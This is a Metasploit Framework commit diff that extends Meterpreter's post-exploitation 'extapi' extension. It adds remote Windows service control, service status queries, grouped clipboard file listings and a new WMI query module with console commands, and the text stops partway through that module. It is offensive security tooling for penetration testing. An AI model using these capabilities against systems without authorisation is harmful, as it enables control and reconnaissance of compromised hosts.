Land #3122, lots of Meterpreter updates
This lands the binaries built from Meterpreter as of: rapid7/meterpreter#80 , also known as commit 5addac75741fadfff35f4f7839cee6fd69705455 as well as the functional changes in: rapid7/metasploit-framework#2782 rapid7/metasploit-framework#2889 rapid7/metasploit-framework#3061 rapid7/metasploit-framework#3085bug/bundler_fix
commit
c1cbeff5f0
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -134,14 +134,16 @@ private
|
||||||
result[ts]['Text'] = t.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)
|
result[ts]['Text'] = t.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)
|
||||||
end
|
end
|
||||||
|
|
||||||
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f|
|
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES) do |fs|
|
||||||
ts = f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP)
|
ts = fs.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP)
|
||||||
result[ts] ||= {}
|
result[ts] ||= {}
|
||||||
result[ts]['Files'] ||= []
|
result[ts]['Files'] ||= []
|
||||||
result[ts]['Files'] << {
|
fs.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f|
|
||||||
:name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME),
|
result[ts]['Files'] << {
|
||||||
:size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE)
|
:name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME),
|
||||||
}
|
:size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE)
|
||||||
|
}
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg|
|
response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg|
|
||||||
|
|
|
@ -5,6 +5,7 @@ require 'rex/post/meterpreter/extensions/extapi/window/window'
|
||||||
require 'rex/post/meterpreter/extensions/extapi/service/service'
|
require 'rex/post/meterpreter/extensions/extapi/service/service'
|
||||||
require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
|
require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
|
||||||
require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
|
require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
|
||||||
|
require 'rex/post/meterpreter/extensions/extapi/wmi/wmi'
|
||||||
|
|
||||||
module Rex
|
module Rex
|
||||||
module Post
|
module Post
|
||||||
|
@ -29,10 +30,11 @@ class Extapi < Extension
|
||||||
'name' => 'extapi',
|
'name' => 'extapi',
|
||||||
'ext' => ObjectAliases.new(
|
'ext' => ObjectAliases.new(
|
||||||
{
|
{
|
||||||
'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client),
|
'window' => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client),
|
||||||
'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
|
'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
|
||||||
'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
|
'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
|
||||||
'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client)
|
'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client),
|
||||||
|
'wmi' => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client)
|
||||||
})
|
})
|
||||||
},
|
},
|
||||||
])
|
])
|
||||||
|
|
|
@ -15,18 +15,26 @@ module Service
|
||||||
###
|
###
|
||||||
class Service
|
class Service
|
||||||
|
|
||||||
|
SERVICE_OP_START = 1
|
||||||
|
SERVICE_OP_PAUSE = 2
|
||||||
|
SERVICE_OP_RESUME = 3
|
||||||
|
SERVICE_OP_STOP = 4
|
||||||
|
SERVICE_OP_RESTART = 5
|
||||||
|
|
||||||
def initialize(client)
|
def initialize(client)
|
||||||
@client = client
|
@client = client
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
# Enumerate all the services on the target.
|
# Enumerate all the services on the target.
|
||||||
|
#
|
||||||
def enumerate
|
def enumerate
|
||||||
request = Packet.create_request('extapi_service_enum')
|
request = Packet.create_request('extapi_service_enum')
|
||||||
response = client.send_request(request)
|
response = client.send_request(request)
|
||||||
|
|
||||||
services = []
|
services = []
|
||||||
|
|
||||||
response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) { |s|
|
response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) do |s|
|
||||||
services << {
|
services << {
|
||||||
:name => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_NAME),
|
:name => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_NAME),
|
||||||
:display => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME),
|
:display => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME),
|
||||||
|
@ -34,29 +42,59 @@ class Service
|
||||||
:status => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_STATUS),
|
:status => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_STATUS),
|
||||||
:interactive => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE)
|
:interactive => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE)
|
||||||
}
|
}
|
||||||
}
|
end
|
||||||
|
|
||||||
return services.sort_by { |s| s[:name].upcase }
|
services.sort_by { |s| s[:name].upcase }
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
# Query some detailed parameters about a particular service.
|
# Query some detailed parameters about a particular service.
|
||||||
|
#
|
||||||
def query(service_name)
|
def query(service_name)
|
||||||
request = Packet.create_request('extapi_service_query')
|
request = Packet.create_request('extapi_service_query')
|
||||||
request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name)
|
request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name)
|
||||||
|
|
||||||
response = client.send_request(request)
|
response = client.send_request(request)
|
||||||
|
|
||||||
detail = {
|
{
|
||||||
:starttype => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE),
|
:starttype => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE),
|
||||||
:display => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME),
|
:display => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME),
|
||||||
:startname => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME),
|
:startname => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME),
|
||||||
:path => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_PATH),
|
:path => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_PATH),
|
||||||
:logroup => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP),
|
:logroup => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP),
|
||||||
:interactive => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE),
|
:interactive => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE),
|
||||||
:dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL)
|
:dacl => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL),
|
||||||
|
:status => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STATUS)
|
||||||
}
|
}
|
||||||
|
end
|
||||||
|
|
||||||
return detail
|
#
|
||||||
|
# Control a single service
|
||||||
|
#
|
||||||
|
def control(service_name, op)
|
||||||
|
if op.is_a? String
|
||||||
|
case op.strip.downcase
|
||||||
|
when "start"
|
||||||
|
op = SERVICE_OP_START
|
||||||
|
when "pause"
|
||||||
|
op = SERVICE_OP_PAUSE
|
||||||
|
when "resume"
|
||||||
|
op = SERVICE_OP_RESUME
|
||||||
|
when "stop"
|
||||||
|
op = SERVICE_OP_STOP
|
||||||
|
when "restart"
|
||||||
|
op = SERVICE_OP_RESTART
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
unless (op.is_a? Integer) && op >= SERVICE_OP_START && op <= SERVICE_OP_RESTART
|
||||||
|
raise ArgumentError, "Invalid operation: #{op}"
|
||||||
|
end
|
||||||
|
|
||||||
|
request = Packet.create_request('extapi_service_control')
|
||||||
|
request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_NAME, service_name)
|
||||||
|
request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_OP, op)
|
||||||
|
client.send_request(request)
|
||||||
end
|
end
|
||||||
|
|
||||||
attr_accessor :client
|
attr_accessor :client
|
||||||
|
|
|
@ -27,6 +27,10 @@ TLV_TYPE_EXT_SERVICE_QUERY_PATH = TLV_META_TYPE_STRING | (TLV_TYPE_E
|
||||||
TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24)
|
TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24)
|
||||||
TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25)
|
TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25)
|
||||||
TLV_TYPE_EXT_SERVICE_QUERY_DACL = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26)
|
TLV_TYPE_EXT_SERVICE_QUERY_DACL = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26)
|
||||||
|
TLV_TYPE_EXT_SERVICE_QUERY_STATUS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 27)
|
||||||
|
|
||||||
|
TLV_TYPE_EXT_SERVICE_CTRL_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 28)
|
||||||
|
TLV_TYPE_EXT_SERVICE_CTRL_OP = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 29)
|
||||||
|
|
||||||
TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35)
|
TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD = TLV_META_TYPE_BOOL | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35)
|
||||||
|
|
||||||
|
@ -38,6 +42,7 @@ TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT = TLV_META_TYPE_STRING | (TLV_TYPE_E
|
||||||
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41)
|
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41)
|
||||||
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42)
|
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42)
|
||||||
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE = TLV_META_TYPE_QWORD | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43)
|
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE = TLV_META_TYPE_QWORD | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43)
|
||||||
|
TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 44)
|
||||||
|
|
||||||
TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45)
|
TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45)
|
||||||
TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46)
|
TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46)
|
||||||
|
@ -57,6 +62,14 @@ TLV_TYPE_EXT_ADSI_RESULT = TLV_META_TYPE_GROUP | (TLV_TYPE_E
|
||||||
TLV_TYPE_EXT_ADSI_MAXRESULTS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 60)
|
TLV_TYPE_EXT_ADSI_MAXRESULTS = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 60)
|
||||||
TLV_TYPE_EXT_ADSI_PAGESIZE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 61)
|
TLV_TYPE_EXT_ADSI_PAGESIZE = TLV_META_TYPE_UINT | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 61)
|
||||||
|
|
||||||
|
TLV_TYPE_EXT_WMI_DOMAIN = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 65)
|
||||||
|
TLV_TYPE_EXT_WMI_QUERY = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 66)
|
||||||
|
TLV_TYPE_EXT_WMI_FIELD = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 67)
|
||||||
|
TLV_TYPE_EXT_WMI_VALUE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 68)
|
||||||
|
TLV_TYPE_EXT_WMI_FIELDS = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69)
|
||||||
|
TLV_TYPE_EXT_WMI_VALUES = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70)
|
||||||
|
TLV_TYPE_EXT_WMI_ERROR = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 71)
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -0,0 +1,75 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
module Rex
|
||||||
|
module Post
|
||||||
|
module Meterpreter
|
||||||
|
module Extensions
|
||||||
|
module Extapi
|
||||||
|
module Wmi
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# This meterpreter extension contains extended API functions for
|
||||||
|
# performing WMI queries.
|
||||||
|
#
|
||||||
|
###
|
||||||
|
class Wmi
|
||||||
|
|
||||||
|
def initialize(client)
|
||||||
|
@client = client
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Perform a generic wmi query against the target machine.
|
||||||
|
#
|
||||||
|
# @param query [String] The WMI query string.
|
||||||
|
# @param root [String] Specify root to target, otherwise defaults
|
||||||
|
# to 'root\cimv2'
|
||||||
|
#
|
||||||
|
# @returns [Hash] Array of field names with associated values.
|
||||||
|
#
|
||||||
|
def query(query, root = nil)
|
||||||
|
request = Packet.create_request('extapi_wmi_query')
|
||||||
|
|
||||||
|
request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank?
|
||||||
|
request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query)
|
||||||
|
|
||||||
|
response = client.send_request(request)
|
||||||
|
|
||||||
|
# Bomb out with the right error messa
|
||||||
|
error_msg = response.get_tlv_value(TLV_TYPE_EXT_WMI_ERROR)
|
||||||
|
raise error_msg if error_msg
|
||||||
|
|
||||||
|
fields = []
|
||||||
|
fields_tlv = response.get_tlv(TLV_TYPE_EXT_WMI_FIELDS)
|
||||||
|
|
||||||
|
# If we didn't get any fields back, then we didn't get any results.
|
||||||
|
# The reason is because without results, we don't know which fields
|
||||||
|
# were requested in the first place
|
||||||
|
return nil unless fields_tlv
|
||||||
|
|
||||||
|
fields_tlv.each(TLV_TYPE_EXT_WMI_FIELD) { |f|
|
||||||
|
fields << f.value
|
||||||
|
}
|
||||||
|
|
||||||
|
values = []
|
||||||
|
response.each(TLV_TYPE_EXT_WMI_VALUES) { |r|
|
||||||
|
value = []
|
||||||
|
r.each(TLV_TYPE_EXT_WMI_VALUE) { |v|
|
||||||
|
value << v.value
|
||||||
|
}
|
||||||
|
values << value
|
||||||
|
}
|
||||||
|
|
||||||
|
return {
|
||||||
|
:fields => fields,
|
||||||
|
:values => values
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
attr_accessor :client
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end; end; end; end; end; end
|
||||||
|
|
|
@ -17,6 +17,7 @@ class Console::CommandDispatcher::Extapi
|
||||||
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service'
|
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service'
|
||||||
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard'
|
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard'
|
||||||
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi'
|
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi'
|
||||||
|
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi'
|
||||||
|
|
||||||
Klass = Console::CommandDispatcher::Extapi
|
Klass = Console::CommandDispatcher::Extapi
|
||||||
|
|
||||||
|
@ -25,7 +26,8 @@ class Console::CommandDispatcher::Extapi
|
||||||
Klass::Window,
|
Klass::Window,
|
||||||
Klass::Service,
|
Klass::Service,
|
||||||
Klass::Clipboard,
|
Klass::Clipboard,
|
||||||
Klass::Adsi
|
Klass::Adsi,
|
||||||
|
Klass::Wmi
|
||||||
]
|
]
|
||||||
|
|
||||||
include Console::CommandDispatcher
|
include Console::CommandDispatcher
|
||||||
|
|
|
@ -22,8 +22,9 @@ class Console::CommandDispatcher::Extapi::Service
|
||||||
#
|
#
|
||||||
def commands
|
def commands
|
||||||
{
|
{
|
||||||
"service_enum" => "Enumerate all registered Windows services",
|
"service_enum" => "Enumerate all registered Windows services",
|
||||||
"service_query" => "Query more detail about a specific Windows service"
|
"service_query" => "Query more detail about a specific Windows service",
|
||||||
|
"service_control" => "Control a single service (start/pause/resume/stop/restart)"
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -33,6 +34,32 @@ class Console::CommandDispatcher::Extapi::Service
|
||||||
def name
|
def name
|
||||||
"Extapi: Service Management"
|
"Extapi: Service Management"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Initialize the instance
|
||||||
|
#
|
||||||
|
def initialize(shell)
|
||||||
|
super
|
||||||
|
|
||||||
|
@status_map = {
|
||||||
|
1 => "Stopped",
|
||||||
|
2 => "Starting",
|
||||||
|
3 => "Stopping",
|
||||||
|
4 => "Running",
|
||||||
|
5 => "Continuing",
|
||||||
|
6 => "Pausing",
|
||||||
|
7 => "Paused"
|
||||||
|
}
|
||||||
|
|
||||||
|
@start_type_map = {
|
||||||
|
0 => "Boot",
|
||||||
|
1 => "System",
|
||||||
|
2 => "Automatic",
|
||||||
|
3 => "Manual",
|
||||||
|
4 => "Disabled"
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Options for the service_enum command.
|
# Options for the service_enum command.
|
||||||
#
|
#
|
||||||
|
@ -44,7 +71,7 @@ class Console::CommandDispatcher::Extapi::Service
|
||||||
# Query a single service for more detail.
|
# Query a single service for more detail.
|
||||||
#
|
#
|
||||||
def cmd_service_enum(*args)
|
def cmd_service_enum(*args)
|
||||||
@@service_enum_opts.parse(args) { |opt, idx, val|
|
@@service_enum_opts.parse(args) do |opt, idx, val|
|
||||||
case opt
|
case opt
|
||||||
when "-h"
|
when "-h"
|
||||||
print(
|
print(
|
||||||
|
@ -55,17 +82,7 @@ class Console::CommandDispatcher::Extapi::Service
|
||||||
"able to interact with the desktop.\n\n")
|
"able to interact with the desktop.\n\n")
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
}
|
end
|
||||||
|
|
||||||
status_map = {
|
|
||||||
1 => "Stopped",
|
|
||||||
2 => "Starting",
|
|
||||||
3 => "Stopping",
|
|
||||||
4 => "Running",
|
|
||||||
5 => "Continuing",
|
|
||||||
6 => "Pausing",
|
|
||||||
7 => "Paused"
|
|
||||||
}
|
|
||||||
|
|
||||||
services = client.extapi.service.enumerate
|
services = client.extapi.service.enumerate
|
||||||
|
|
||||||
|
@ -78,14 +95,14 @@ class Console::CommandDispatcher::Extapi::Service
|
||||||
]
|
]
|
||||||
)
|
)
|
||||||
|
|
||||||
services.each { |s|
|
services.each do |s|
|
||||||
table << [
|
table << [
|
||||||
s[:pid],
|
s[:pid],
|
||||||
status_map[s[:status]],
|
@status_map[s[:status]],
|
||||||
s[:interactive] ? "Y" : "N",
|
s[:interactive] ? "Y" : "N",
|
||||||
"#{s[:name].downcase} (#{s[:display]})"
|
"#{s[:name].downcase} (#{s[:display]})"
|
||||||
]
|
]
|
||||||
}
|
end
|
||||||
|
|
||||||
print_line
|
print_line
|
||||||
print_line(table.to_s)
|
print_line(table.to_s)
|
||||||
|
@ -107,9 +124,9 @@ class Console::CommandDispatcher::Extapi::Service
|
||||||
# Query a single service for more detail.
|
# Query a single service for more detail.
|
||||||
#
|
#
|
||||||
def cmd_service_query(*args)
|
def cmd_service_query(*args)
|
||||||
args << "-h" if args.length == 0
|
args.unshift("-h") if args.length != 1
|
||||||
|
|
||||||
@@service_query_opts.parse(args) { |opt, idx, val|
|
@@service_query_opts.parse(args) do |opt, idx, val|
|
||||||
case opt
|
case opt
|
||||||
when "-h"
|
when "-h"
|
||||||
print(
|
print(
|
||||||
|
@ -119,25 +136,18 @@ class Console::CommandDispatcher::Extapi::Service
|
||||||
"binary path, DACL, load order group, start type and more.\n\n")
|
"binary path, DACL, load order group, start type and more.\n\n")
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
}
|
end
|
||||||
|
|
||||||
service_name = args.shift
|
service_name = args.shift
|
||||||
|
|
||||||
start_type_map = {
|
|
||||||
0 => "Boot",
|
|
||||||
1 => "System",
|
|
||||||
2 => "Automatic",
|
|
||||||
3 => "Manual",
|
|
||||||
4 => "Disabled"
|
|
||||||
}
|
|
||||||
|
|
||||||
detail = client.extapi.service.query(service_name)
|
detail = client.extapi.service.query(service_name)
|
||||||
|
|
||||||
print_line
|
print_line
|
||||||
print_line("Name : #{service_name}")
|
print_line("Name : #{service_name}")
|
||||||
print_line("Display : #{detail[:display]}")
|
print_line("Display : #{detail[:display]}")
|
||||||
print_line("Account : #{detail[:startname]}")
|
print_line("Account : #{detail[:startname]}")
|
||||||
print_line("Start Type : #{start_type_map[detail[:starttype]]}")
|
print_line("Status : #{@status_map[detail[:status]]}")
|
||||||
|
print_line("Start Type : #{@start_type_map[detail[:starttype]]}")
|
||||||
print_line("Path : #{detail[:path]}")
|
print_line("Path : #{detail[:path]}")
|
||||||
print_line("L.O. Group : #{detail[:logroup]}")
|
print_line("L.O. Group : #{detail[:logroup]}")
|
||||||
print_line("Interactive : #{detail[:interactive] ? "Yes" : "No"}")
|
print_line("Interactive : #{detail[:interactive] ? "Yes" : "No"}")
|
||||||
|
@ -146,6 +156,39 @@ class Console::CommandDispatcher::Extapi::Service
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Options for the service_control command.
|
||||||
|
#
|
||||||
|
@@service_control_opts = Rex::Parser::Arguments.new(
|
||||||
|
"-h" => [ false, "Help banner" ]
|
||||||
|
)
|
||||||
|
|
||||||
|
#
|
||||||
|
# Query a single service for more detail.
|
||||||
|
#
|
||||||
|
def cmd_service_control(*args)
|
||||||
|
args.unshift("-h") if args.length != 2
|
||||||
|
|
||||||
|
@@service_control_opts.parse(args) do |opt, idx, val|
|
||||||
|
case opt
|
||||||
|
when "-h"
|
||||||
|
print(
|
||||||
|
"\nUsage: service_control [-h] <servicename> <op>\n" +
|
||||||
|
" <servicename> : The name of the service to control.\n" +
|
||||||
|
" <op> : The operation to perform on the service.\n" +
|
||||||
|
" Valid ops: start pause resume stop restart.\n\n")
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
service_name = args[0]
|
||||||
|
op = args[1]
|
||||||
|
|
||||||
|
client.extapi.service.control(service_name, op)
|
||||||
|
|
||||||
|
print_good("Operation #{op} succeeded.")
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -0,0 +1,108 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
require 'rex/post/meterpreter'
|
||||||
|
|
||||||
|
module Rex
|
||||||
|
module Post
|
||||||
|
module Meterpreter
|
||||||
|
module Ui
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# Extended API WMI Querying interface.
|
||||||
|
#
|
||||||
|
###
|
||||||
|
class Console::CommandDispatcher::Extapi::Wmi
|
||||||
|
|
||||||
|
Klass = Console::CommandDispatcher::Extapi::Wmi
|
||||||
|
|
||||||
|
include Console::CommandDispatcher
|
||||||
|
|
||||||
|
# Zero indicates "no limit"
|
||||||
|
DEFAULT_MAX_RESULTS = 0
|
||||||
|
DEFAULT_PAGE_SIZE = 0
|
||||||
|
|
||||||
|
#
|
||||||
|
# List of supported commands.
|
||||||
|
#
|
||||||
|
def commands
|
||||||
|
{
|
||||||
|
"wmi_query" => "Perform a generic WMI query and return the results"
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Name for this dispatcher
|
||||||
|
#
|
||||||
|
def name
|
||||||
|
"Extapi: WMI Querying"
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Options for the wmi_query command.
|
||||||
|
#
|
||||||
|
@@wmi_query_opts = Rex::Parser::Arguments.new(
|
||||||
|
"-h" => [ false, "Help banner" ],
|
||||||
|
"-r" => [ true, "Specify a different root object (defaults to 'root\\CIMV2')" ]
|
||||||
|
)
|
||||||
|
|
||||||
|
def wmi_query_usage
|
||||||
|
print(
|
||||||
|
"\nUsage: wmi_query <query string> [-r root]\n\n" +
|
||||||
|
"Query the target and display the results.\n\n" +
|
||||||
|
@@wmi_query_opts.usage)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Enumerate WMI objects.
|
||||||
|
#
|
||||||
|
def cmd_wmi_query(*args)
|
||||||
|
args.unshift("-h") if args.length < 1
|
||||||
|
|
||||||
|
root = nil
|
||||||
|
|
||||||
|
@@wmi_query_opts.parse(args) { |opt, idx, val|
|
||||||
|
case opt
|
||||||
|
when "-r"
|
||||||
|
root = val
|
||||||
|
when "-h"
|
||||||
|
wmi_query_usage
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
}
|
||||||
|
|
||||||
|
query = args.shift
|
||||||
|
|
||||||
|
objects = client.extapi.wmi.query(query, root)
|
||||||
|
|
||||||
|
if objects
|
||||||
|
table = Rex::Ui::Text::Table.new(
|
||||||
|
'Header' => query,
|
||||||
|
'Indent' => 0,
|
||||||
|
'SortIndex' => 0,
|
||||||
|
'Columns' => objects[:fields]
|
||||||
|
)
|
||||||
|
|
||||||
|
objects[:values].each do |c|
|
||||||
|
table << c
|
||||||
|
end
|
||||||
|
|
||||||
|
print_line
|
||||||
|
print_line(table.to_s)
|
||||||
|
|
||||||
|
